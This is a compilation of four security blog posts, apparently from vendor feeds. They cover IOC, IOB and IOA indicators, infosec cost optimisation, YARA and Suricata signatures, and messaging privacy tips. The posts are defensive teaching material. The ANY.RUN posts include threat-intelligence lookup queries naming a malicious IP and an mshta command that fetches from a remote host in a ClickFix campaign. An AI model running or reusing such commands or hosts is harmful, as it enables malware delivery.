In cybersecurity, the three main types of indicators are a critical concept for threat detection and response. These main types are indicators of compromise, behavior, and attack (IOCs, IOBs, IOAs). Let’s elaborate on their essence, difference, and use.  

Distinction in a Nutshell 

Indicators of Compromise 

IOCs are pieces of evidence that suggest that a system, network, or device has been compromised by a cyberattack or malicious activity. They are typically reactive, meaning they are identified after an attack has occurred. 

The main purpose of IOCs is to help detect and confirm security incidents with known threats or malware. They serve as forensic evidence in incident investigations and are necessary for adequate incident response and mitigation. 

More often than not IOCs are specific — tied to a particular malware or campaign.  

IOCs can be classified into:  

• File-based: malicious file hashes (e.g., MD5, SHA-1, SHA-256), known malware signatures. 

• Network-based: suspicious IP addresses, domains, URLs, or unusual traffic patterns (e.g., connections to a known command-and-control server). 

• System-based: registry key changes, unauthorized user accounts, or suspicious processes running. 

Being reactive by their nature, IOCs are of immense help in threat prevention. When used smartly, they can be weaponized to block, disrupt, or preempt similar attacks in the future. 

This function is provided by threat intelligence: SOC teams collect indicators associated with known malware and incidents (malicious IPs, domains, file hashes, or URLs) and blacklist them in their security systems to prevent future communication or execution associated with those IOCs. 

For example, a phishing domain seen in a past attack is added to the block list, preventing any user from accessing it if reused. Potential IOCs can be checked with the help of services like ANY.RUN’s Threat Intelligence Lookup.  It searches for information from malware samples added and analyzed in the Interactive Sandbox: 

destinationIP:”147.185.221.26″ 

Another way of using IOCs for proactive protection is setting up decoys (honeypots or honeytokens) to monitor access to known indicators or infrastructure that mimics IOC traits. 

Finally, IOCs reveal which vulnerabilities are being exploited, so teams can prioritize patching or tighten firewall rules accordingly. 

IOCs have their limitations, though. They may not help to detect brand new or advanced threats. It’s important to keep in mind that attackers can easily change IOCs (e.g., domains, hashes), so IOC-based prevention is only as effective as its freshness and context. Context also helps to reduce false positives in detection.  

Context can also be provided by TI Lookup: it supports over 40 search parameters and wildcards which allows to combine indicators and parameters in complex search queries:

(syncObjectName:”PackageManager” or syncObjectName:”DocumentUpdater”) and syncObjectOperation:”Create” 

Mutexes often generate false positive alerts in monitoring systems. Malware samples can contain the same objects as legitimate programs, and a lot of mutex names are generic. 

Switching to the Analyses tab in the search results, we see, that the combination of mutexes with such innocent general names as PackageManager and DocumentUpdater occurs in malware campaigns of MuddyWater APT group from Iran, which is exactly as dangerous as an APT group from Iran is supposed to be.  

On the other hand, this combination of mutexes was last spotted in malware samples about four months ago which allows us to consider this signal obsolete.  

Security teams share IOCs via threat intelligence feeds: continuously updated data streams with indicators from fresh malware samples integrated with monitoring and detection systems. ANY.RUN provides Threat Intelligence Feeds in STIX and MISP formats. 

Indicators of Behavior 

IOBs focus on patterns or behaviors that suggest malicious activity, rather than specific artifacts or static signatures. They describe how an attacker operates, often describing tactics, techniques, and procedures (TTPs). In other words, these indicators focus on what an attacker does rather than specific tools or files. 

This enables them to be used for detecting zero-day attacks, unknown or evolving threats that may not have specific IOCs which makes IOBs useful in proactive threat hunting and monitoring. Suspicious behavior can signal an attack in progress, before significant damage occurs.  

IOBs may refer to:  

• User Behavior: An account logs in from an unusual location or at an odd time. 

• System Behavior: A process attempts to access sensitive files repeatedly or executes unauthorized scripts. 

• Network Behavior: Encrypted traffic spikes to unknown external servers, resembling data exfiltration. 

Thus, typical examples of IOBs are:  

• Use of living-off-the-land binaries (e.g., rundll32, certutil); 

• Obfuscation techniques; 

• Credential dumping after privilege escalation; 

• Repeated use of valid accounts for persistence.

IOBs also come with a few shortcomings. It requires advanced analytics, such as behavioral analysis or machine learning, to identify anomalies. Sophisticated monitoring tools (e.g., SIEM, UEBA) should be employed to work with this family of indicators. They can be resource-intensive to analyze and validate. And they may produce false positives if legitimate behaviors mimic malicious ones. 

ANY.RUN’s Interactive Sandbox allows analysts to observe how malware or suspicious files behave in a controlled environment and detect anomalous behaviors that may indicate a potential threat. For example, in this analysis session we see remote code execution via mshta.exe triggered by a command entered manually by a user and mentioning a (misspelled) CAPTCHA:

What does this activity indicate? In their latest campaign, Storm-1865 distributed phishing emails impersonating Booking.com. The emails contained links leading to fake CAPTCHA pages designed to build trust and lure users into interaction. The threat actor leveraged the ClickFix technique, instructing victims to paste a malicious command into the Windows command prompt. 

The campaign has been observed delivering several commodity malware families, including XWorm, Lumma Stealer, VenomRAT, AsyncRAT, DanaBot, and NetSupport RAT. With the following TI lookup query, we can search through recent public sandbox analyses and find samples with the same malicious activity for further research: 

commandLine:”mshta92.255.57.155/Capcha“ 

Indicators of Attack 

IOAs are proactive indicators that focus on the intent and actions of an adversary during an attack, emphasizing the “how” and “why” of malicious activity. They aim to detect attacks in real time, and to catch it in its early stages (e.g., during reconnaissance, exploitation, or lateral movement). This allows cybersecurity teams to prevent attacks by interrupting the kill chain. 

Examples of IOAs:  

• Reconnaissance: Unusual port scanning or enumeration of network resources. 

• Exploitation: Attempts to exploit a known vulnerability (e.g., SQL injection or buffer overflow). 

• Persistence: Installation of backdoors or scheduled tasks to maintain access. 

• Lateral Movement: Abnormal internal network traffic, such as attempts to access multiple systems with stolen credentials. 

• C2 Communication: Process beaconing to rare external IP at intervals. 

• Credential Theft: LSASS memory access by a non-standard process. 

• Data Exfiltration: Sensitive files zipped and sent via Dropbox or OneDrive. 

What typical indicators of attack might look like:  

• Word document spawns PowerShell; 

• Process injection detected; 

• A user logs in from two geographies within minutes; 

• Suspicious lateral movement. 

Since IOAs are specific signs of an active or imminent attack, often tied to known TTPs or malicious artifacts, it is possible to research these indicators with the aid of ANY.RUN’s Threat Intelligence Lookup through the Interactive MITRE ATT&CK Matrix.

The Matrix lets you map TTPs to actual samples of malware and phishing threats and view their entire execution chain inside the Interactive Sandbox, as well as collect additional indicators.

Conclusion  

The most valuable aspect of indicators in institutional cybersecurity is of course their potential to help prevent threats and incidents, stop attacks from succeeding, and thus avoiding financial loss, operational disruption, and reputation damage. Regularly collecting and using IOCs, IOAs, and IOBs, including with the services like ANY.RUN’s TI Lookup and TI Feeds, can help your SOC team fight off threats and keep your infrastructure safe.

About ANY.RUN

ANY.RUN helps more than 500,000 cybersecurity professionals and 15,000 organizations worldwide. The Interactive Sandbox simplifies malware analysis of threats that target both Windows and Linux systems. The threat intelligence products, TI Lookup, YARA Search, and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.

Integrate ANY.RUN’s Threat Intelligence suite in your organization →

The post How Indicators of Compromise, Attack, and Behavior Help Spot and Stop Cyber Threats appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

In late March, the popular CISO MindMap, a cheat sheet on infosec team priorities, was updated. However, the economic landscape began shifting just days after its release. Now that the likelihood of economic instability, recession, falling oil prices, and rising microchip costs has increased, many companies and their CISOs face a pressing issue: cost optimization. In light of these developments, we decided to examine the CISO MindMap from a different angle, and highlight new or crucial infosec projects that can contribute to budget savings without creating excessive organizational risks.

Optimization of tools

MindMap authors advice CISOs to “consolidate and rationalize infosec tools”. In an IDC study from 2024, something like half of all large organizations surveyed used more than 40 infosec tools, and a quarter – more than 60. This abundance typically leads to decreased productivity, employee fatigue from unsynchronized and uncoordinated alerts, and excessive expenditure.

The solution lies in either consolidating the tech stack under a single-vendor approach (one vendor for the security platform and all its components), or selecting the best tool in each category. The latter approach requires (i) strict compliance with open communication standards, and (ii) API integration capabilities. It’s better suited for technologically mature teams capable of allocating internal resources (primarily time) to properly and efficiently set up integrations according to the infosec department’s procedures.

For effective stack consolidation, there are specialized planning tools that can assess all infosec systems that have been implemented, identify gaps in coverage, and pinpoint areas of significant functional overlap. This analysis also reveals inefficiently used tools that can be safely eliminated. For some niche and infrequent tasks, open-source tools can bring about budget savings. However, for large systems like SIEM that see regular use, open-source solutions may not be cheaper than proprietary ones due to the extensive efforts required for implementation, fine-tuning and support.

Consolidation often goes hand-in-hand with automation, which is only achievable with a well-synchronized toolset. In the same above-mentioned IDC study, it was found that companies that consolidated their tools and adopted modern XDR and SOAR solutions achieved average cost savings of 16% and analyst time savings of 20%. Simultaneously, they saw an improvement in organizational security with Mean Time to Respond (MTTR) decreasing by 21% and incident resolution time by 19.5%.

Automation

While automation projects initially involve additional expenses, their implementation in infosec processes pays off in the long run by saving analyst time and mitigating the talent shortage. Automation is not necessarily based on neural networks and language models, but these trendy technologies are already making practical contributions in several infosec areas. Tangible results are primarily achievable through the following measures:

• Selective incident response automation
• Alert prioritization in the monitoring center
• Application of infosec policies to accounts and resources
• Verification of compliance of internal policies with regulatory ones and enforcement of these policies
• Risk assessment and prioritization of infosec controls
• Automated third-party risk management (TPRM)

Generative AI

Despite the economic challenges, many companies continue to prioritize the implementation of AI-powered tools, viewing these as essential for future competitiveness and economic efficiency. Some organizations have even issued management directives such as “Before you hire a new employee, prove that AI cannot do their job.”

From the infosec perspective, the widespread adoption of AI-powered technology has both advantages and disadvantages. On the one hand, the vast and poorly understood array of AI tools creates a significant additional workload on infosec teams. On the other, it provides an opportunity to launch and fund various infosec initiatives within the broader corporate AI implementation program. To effectively manage AI-related risks, a company needs to do the following:

• Establish standards and regulations for the use of AI-powered solutions, while keeping in mind the rapidly evolving regulatory landscape in this area
• Create a controlled list of approved AI tools for different departments and processes
• Regularly review recommendations and verify that all AI-driven processes comply with infosec policies
• Include AI tools in the asset inventory for vulnerability management and infosec assessments
•  Develop specialized training programs for both AI users and infosec personnel

Using open-source AI solutions instead of proprietary cloud systems can reduce operational costs and enhance data protection – especially when the solutions are deployed within the organization’s network or in a private cloud. However, the availability of suitable, high-quality open-source models depends on the specific use case.

Meaningful infosec metrics

This area doesn’t require substantial financial investment but it significantly simplifies the process of justifying infosec budgets to the board of directors. The composition of key metrics varies across industries and companies, but the following groups are worth considering:

• Risk level and achieved risk reduction expressed in financial terms
• Organizational readiness for attacks (MTTR, MTTD) and its trends
• Progress in ongoing infosec projects, including automation and tool consolidation
• Effectiveness of infosec measures and its trends: average time to remediate critical and other vulnerabilities, percentage of users successfully passing cybersecurity testing, and so on

Identity management

While implementing comprehensive IAM solutions can be expensive, companies can find a balance that provides significant risk reduction at a reasonable cost.

Many companies still lack basic infosec controls like multi-factor authentication. Even limited implementation of these controls significantly reduces the risk of compromise through credential theft. In addition to cost-effective solutions that utilize TOTP-based authenticator apps, 2025 has seen passkey-based solutions mature and become quite user-friendly on the major platforms (Microsoft, Google, Apple). This phishing-resistant, highly affordable authentication method is worth deploying at least for employees who have access to critical data and systems, and ideally, for everyone. Ultimately, the transition to passkeys can also improve efficiency for all employees, as password-free access saves time and reduces support costs for password-related issues.

Another aspect of IAM is centralized management of machine identities, API tokens, and other secrets. Due to a significant increase in attacks on cloud environments, investments in this area are likely unavoidable. However, many companies can strategically plan the implementation of appropriate tools by deploying open-source solutions in their infrastructure, utilizing secret managers included in their cloud provider subscriptions, and so on.

SOC cost management

Security operations centers (SOCs) represent a major expense in any infosec budget, with significant costs associated with analyst effort, data storage, and processing. Effective separation into “hot” and “cold” log storage can significantly reduce data storage costs. For large companies, it’s worth considering hierarchical or geographically distributed processing infrastructure. In some cases, such as with our SIEM – the Kaspersky Unified Monitoring and Analysis Platform – SIEM hardware savings can reach 50%.

Kaspersky official blog – ​Read More

Every piece of malware leaves traces behind. Sometimes it’s a string buried deep in the code. Other times it’s a mutex, a registry key, or a network pattern. The key is knowing what to look for. 

That’s exactly what malware signatures are for. They describe these recurring elements, unique strings, behaviors, or structural patterns, that can be used to reliably identify known threats. 

Security teams use these signatures to detect and flag malicious activity; sometimes before the malware even has a chance to do damage. 

In this article, we’ll break down what malware signatures are, the different types you’ll encounter, and how tools like YARA and Suricata help turn small clues into confident decisions. 

What Is a Malware Signature? 

A malware signature is a unique indicator tied to a specific piece of malicious software. It could be a text string, a file hash, a mutex, or even a sequence of behaviors. Security tools use these signatures to recognize and flag known threats, kind of like matching fingerprints at a crime scene. 

The goal is simple: spot malware based on something that consistently shows up across samples from the same family or campaign. Once identified, these signatures become part of detection rules used by antivirus engines, sandboxes, and intrusion detection systems. 

How Are Malware Signatures Created? 

Malware signatures are usually crafted by security researchers and automated detection systems after analyzing how a threat behaves or what it contains. 

When a new malware sample is discovered, analysts break it down, looking at code, memory behavior, registry changes, network traffic, and other markers. If they notice something unique or consistently present across samples, like a specific mutex name, string, or packet structure, that becomes a potential signature. 

Depending on the tool or platform, these signatures might take different forms; 

• Static signatures are based on strings, byte sequences, or file hashes. 
• Behavioral signatures are based on what the malware does, like creating certain processes or modifying the registry. 
• Custom rules, like YARA or Suricata, allow analysts to define more complex patterns based on real-world observations. 

Main Types of Malware Signatures 

Not all malware looks or behaves the same, and the same goes for how we detect it. Over time, security teams have developed different types of signatures to match different kinds of threats.  

Here are the most common ones: 

Static Signatures 

These are the most traditional and widely used. Static signatures match fixed elements inside a file, like strings, byte sequences, or hashes, without needing to run the malware. 

Key traits: 

• Match based on file content (strings, hex patterns, hashes) 
• Fast and efficient for known threats 
• Can be bypassed through obfuscation or slight code changes 
• Commonly used in antivirus software  

Heuristic Signatures

Heuristic signatures look beyond exact matches. They evaluate the structure or logic of a file to identify suspicious patterns that may indicate malware, even if the sample is new or modified. 

Key traits: 

• Detect threats based on suspicious code structures 
• Useful for catching variants or zero-day malware 
• May generate false positives if too broad 
• Often found in email filters, AVs, and static analyzers 

Behavioral Signatures 

Rather than scanning a file, these signatures monitor what it does when executed. If it behaves like malware, e.g., injecting code or modifying the registry, it gets flagged. 

Key traits: 

• Trigger on real-time actions and behaviors 
• Great for catching fileless or evasive malware 
• Requires sandboxing or endpoint monitoring 
• Common in EDRs, sandboxes, and dynamic analysis tools 

How Detection Tools Use Signatures: YARA and Suricata 

Once malware signatures are defined, they need to be used effectively, and that’s where tools like YARA and Suricata come in. Each serves a unique purpose: one focuses on files and memory, the other on network traffic. Together, they cover a wide range of threats and detection angles. 

YARA Signatures: Matching Patterns in Files and Processes 

YARA is a rule-based detection tool that helps analysts identify malware by describing textual or binary patterns. It’s especially powerful for hunting threats across memory dumps, unpacked payloads, or large malware datasets. 

YARA helps security teams quickly identify threats by matching known patterns in files, processes, or memory. It automates what would otherwise be a slow, manual process, making detection faster, more accurate, and more scalable. 

Its real strength lies in customization. Teams can write tailored rules to catch specific malware strains or adapt to new threats as they emerge. When combined with ANY.RUN’s interactive sandbox, YARA also reveals how they behave, giving organizations the insight they need to act fast and prevent damage. 

Key benefits of YARA in a security workflow: 

• Speeds up detection and reduces manual effort 

• Detects both known and emerging malware families 

• Cuts down false positives with precise rules 

• Boosts efficiency across security teams 

• Helps contain threats early and minimize risk 

Real-World Example: Matching the Mutex Pattern 

Let’s look at an example of YARA rule used in ANY.RUN’s sandbox: 

$s6 = “Local\SM0:%d:%d:%hs” wide 

This string is part of a rule designed to detect mutexes created by certain malware families.

To see this signature in action, check out this ANY.RUN analysis session. 

Navigate to the MediaCenter.exe process → More Info → Synchronization tab. 

There, you’ll find the mutex: LocalSM0:5320:168:WilStaging_02 

This mutex exactly matches the YARA signature pattern. The use of placeholders like %d and %hs allows the rule to flexibly detect variations of this format across different samples. 

• %d matches any sequence of digits (0–9) 

• %hs matches a short string or hexadecimal value, typically 2 bytes 

This is a great example of how YARA rules aren’t just powerful, they’re also adaptable to the real-world quirks of evolving malware behavior. 

Suricata Signatures: Detecting Malicious Behavior in Network Traffic 

While YARA focuses on identifying malware based on what it is, Suricata helps detect malware based on what it does across the network. It’s an advanced intrusion detection system (IDS) that monitors real-time traffic and flags suspicious behavior using both signature- and anomaly-based techniques. 

ANY.RUN integrates Suricata to enhance threat visibility at the network level, allowing analysts to catch threats as they try to communicate with command-and-control servers, exfiltrate data, or spread laterally. Suricata signatures give security teams immediate context; what’s happening, where, and why it matters. 

Key benefits of Suricata in a security workflow: 

• Detects malicious traffic and C2 communication in real time 
• Complements file-based detection with network-layer visibility 
• Helps attribute threats to specific malware families 
• Speeds up incident response with actionable alerts 
• Empowers teams with visibility into protocol activity across multiple layers 

In ANY.RUN, Suricata rules are applied automatically during sandbox analysis. Let’s take a look at a real-world detection involving Gh0st Remote Access Trojan (RAT). 

View analysis session with Gh0st RAT 

After execution, the sample initiates suspicious encrypted traffic. Suricata instantly detects it and flags the connection as Gh0st RAT activity.

How it works: 

• Suricata inspects packets across protocols (HTTP, TCP, UDP, etc.) 
• It matches patterns defined in the ET (Emerging Threats) rule sets 
• Once a match is found, it provides detailed metadata: source/destination IPs, ports, signature ID, and threat name 

By switching to the Suricata rule tab, you’ll be able to inspect it more thoroughly.  

Making the Most of Malware Signatures in ANY.RUN 

Malware signatures can do a lot on their own but when they’re used in the right environment, they become even more useful. 

Inside ANY.RUN’s sandbox, YARA and Suricata work together to give you the full picture. You can see what a file is doing locally, spot mutexes, registry changes, and other signs of malicious behavior, then switch to the network layer to catch things like encrypted C2 traffic or data exfiltration. Both angles are covered, without having to jump between tools. 

Instead of switching between tools, analysts get everything in one place; interactive, real-time, and backed by constantly updated signature sets. This gives less time digging and more time acting. 

If your goal is to reduce investigation time, improve detection accuracy, and truly understand how malware behaves, ANY.RUN puts those capabilities right at your fingertips. 

About ANY.RUN

ANY.RUN is used by over 500,000 cybersecurity professionals and 15,000+ companies across finance, manufacturing, healthcare, and other industries. Its Interactive Sandbox offers fast threat analysis for Windows, Linux, and Android, aiding malware and phishing investigations. Threat Intelligence Lookup and TI Feeds enhance cyber attack knowledge and detection.

Strengthen your company’s cyber resilience with ANY.RUN →

The post Malware Signatures: How Cybersecurity Teams Use Them to Catch Threats  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

How do you keep your chats private and protect your messaging account from being stolen or hacked? Here are 12 simple rules with brief explanations of why each one is important.

Enable two-factor authentication

Why this is important. It keeps your account from being hacked or hijacked through SIM swapping or some other technique. Turning on this setting requires entering your secret password in addition to the SMS verification code when signing in to the messaging app with your account on a new device.

What to do. Open the security and privacy settings of your messaging app, enter a secret password, and memorize it. You’ll only need to enter it when linking a new device to your account. To make things easier, you can generate and store it in a secure password manager, or test the strength of your password using our free Kaspersky Password Checker.

Don’t share one-time passwords

Why this is important. If scammers want to steal your account, they’ll try to trick you into giving them the verification code after you receive it in your messaging app.

What to do. Don’t forward or dictate one-time passwords for signing in to chat apps to anyone. Your friends, support agents, companies, or banks will never need these codes. If someone is asking for a code, it’s a scammer.

Never scan QR codes outside of the messaging app

Why this is important. Some account hijacking schemes masquerade as invitations to join a group or chat. You scan a QR code in an ad, but instead of joining a neighborhood or class chat, you allow a scammer to link their device to your account.

What to do. If someone is asking you to scan a QR code, find the scanner in the messaging app — typically in the Settings. Don’t use your camera or some other QR-code scanning app. Carefully read the prompts displayed by the messaging app: it’ll tell you whether you’re joining a group or channel, or linking a new device to your account.

Carefully check new contact requests

Why this is important. Scammers typically imitate people you know: “Hi! Me again. I’ve a new phone number”. They may even know who your boss is. Many scams that result in major financial losses start with requests from “friends” or “colleagues”. Another type of attack is a “misdialed call” scam. “Is this Hannah? It’s not? Oh, sorry! I misdialed. Anyway, how are things?”

What to do. If you see a new chat, but there’s no history, stay alert! If this is supposedly an acquaintance, ask them about something only they would know. If your boss is texting you, it’s best to confirm it with them directly through a different channel, such as their office phone, work email, or in person, before proceeding. If you get a message from someone claiming it was sent in error, ignore any enticing offers, especially if accompanied by links or files.

Use the block feature

Why this is important. It’s the best way to get rid of stalkers, scammers, and clinging exes.

What to do. Don’t ignore spammers or scammers from the previous tip. Every chat app has a “Block user” button — don’t hesitate to press it! This will prevent the scammer from writing you again — or, after several reports, anyone else. This button is also a great way to minimize reminders of those unpleasant people from your past.

Think before you open a link — even if it’s from a friend

Why this is important. Your friends are vulnerable too. Scammers can compromise their accounts, then use them to send manipulative messages — pleas for help or provocations — to everyone in their contact list, aiming to extort money or hijack further accounts.

What to do. Steer clear of suspicious website links, unfamiliar file attachments, pleas for cash, requests to vote in dubious contests, messages like, “Is that really you in that photo?”, and unexpected, too-good-to-be-true offers like free premium subscriptions. To ensure you don’t stumble into these traps, delete such messages on sight. If they appear to be from someone you know, reach out using another channel, and alert them to the suspicious activity occurring under their name. If you act quickly, you might be able to help your friends recover their accounts, as 24 hours is often all there is to do so.

Restrict access to your smartphone and messaging app

Why this is important. If your phone gets stolen, or you give it to a friend, coworker, or relative, access control will keep anyone from snooping on your chats.

What to do. Enable screen lock: fingerprint, Face ID, or a long PIN. Also, enable App Lock in the phone settings or messaging app itself. Your fingerprint or PIN will be required to open the app every time. Even if you give someone an unlocked phone, they won’t be able to use the chat app.

Turn off message previews

Why this is important. A locked phone screen may display highly sensitive data: from private messages to verification codes from the bank.

What to do. Disable message previews on the lock screen. You can do that in the “Notifications” section of the phone settings.

Use disappearing and one-time-view messages

Why this is important. If you’re sharing things like Wi-Fi passwords, booking details, or your home address, which are only needed for a moment, don’t leave them in your chat history to haunt you later. What if one of you gets hacked?

What to do. When sharing sensitive data, apply either an auto-delete timer for messages or the “view once” setting, depending on the situation. If neither is an appropriate option, set a reminder to revisit the chat and delete the message for both users after an hour, day, or week.

Added bonus. This looks cool and helps keep the chat uncluttered.

Don’t send nudes!

Why this is important. Even if it’s just a one-time view message, the picture might be shown to people around or screenshotted and then used against you.

What to do. Avoid sharing anything that could upset, embarrass, jeopardize, or open you up to blackmail if published. This is true for any private information, not just nudes. If your nudes have already been leaked online, there might still be a chance to get them removed.

Be careful with group chats

Why this is important. You probably trust your friends. But how well do you know the people your friends add to groups?

What not to do. Don’t share your phone numbers, addresses, or other sensitive (your own as well as others’) personal information in large chats.

Limit your profile visibility

Why this is important. Neither scammers nor strangers need to see your profile photo or know when you were last seen online.

What to do. Open the Privacy section in the chat app settings and choose who can see your “Last Seen”, “Profile Photo”, “Status”, and so on. By default, this data is visible to everyone. Adjust the settings to your preference, choosing either “My Contacts” or “Nobody”.

Read other stories to find out how to adjust security and privacy settings in specific messaging apps, and what to do if you’ve been targeted by scammers or had your account compromised:

• WhatsApp and Telegram account hijacking: how to protect yourself against scams
• Setting up both security and privacy in WhatsApp
• What to do if your WhatsApp account gets hacked
• Telegram security and privacy tips
• What to do if your Telegram account is hacked
• … and others

Kaspersky official blog – ​Read More